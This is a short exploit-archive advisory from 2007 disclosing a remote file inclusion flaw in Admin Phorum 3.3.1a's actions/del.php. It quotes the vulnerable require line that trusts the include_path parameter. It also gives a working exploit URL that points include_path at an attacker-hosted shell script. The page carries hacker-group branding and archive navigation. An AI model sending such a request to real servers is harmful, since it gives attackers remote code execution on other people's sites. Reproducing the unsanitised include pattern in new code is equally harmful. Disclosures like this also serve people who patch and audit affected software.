Admin Phorum 3.3.1a (del.php include

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Admin Phorum 3.3.1a (del.php include_path) RFI Vulnerability
# Published : 2007-02-27
# Author : GoLd_M
# Previous Title : vBulletin <= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit
# Next Title : PHP-MIP 0.1 (top.php laypath) Remote File Include Vulnerability

#########################################################################
 #                                                                       #
 # Admin Phorum 3.3.1.a (del.php include_path)File Include Vulnerability #
 #                                                                       #
 # Author:  Gold_M <Hacker_ [at] w.Cn>  [Mahmood_ali]                    #
 #                                                                       #
 # Homepage: Www.Tryag.Cc                                                #
 #                                                                       #
 #########################################################################

 #########################################################################
 # Download S : http://www.phpforums.net/admin331.zip                    #
 # Other Info : http://www.phpforums.net/index.php?dir=dld               # 
 #                                                                       #
 # v.Code : Line 3                                                       #
 #                                                                       #
 # require "$include_path/delete_message.php";                           #
 #                                                                       #
 # Exploit:                                                              #
 # http://[VicTim]/[PaTh]/actions/del.php?include_path=[SHELL-TRYAG]     #
 #                                                                       #
 #########################################################################

# www.Syue.com [2007-02-27]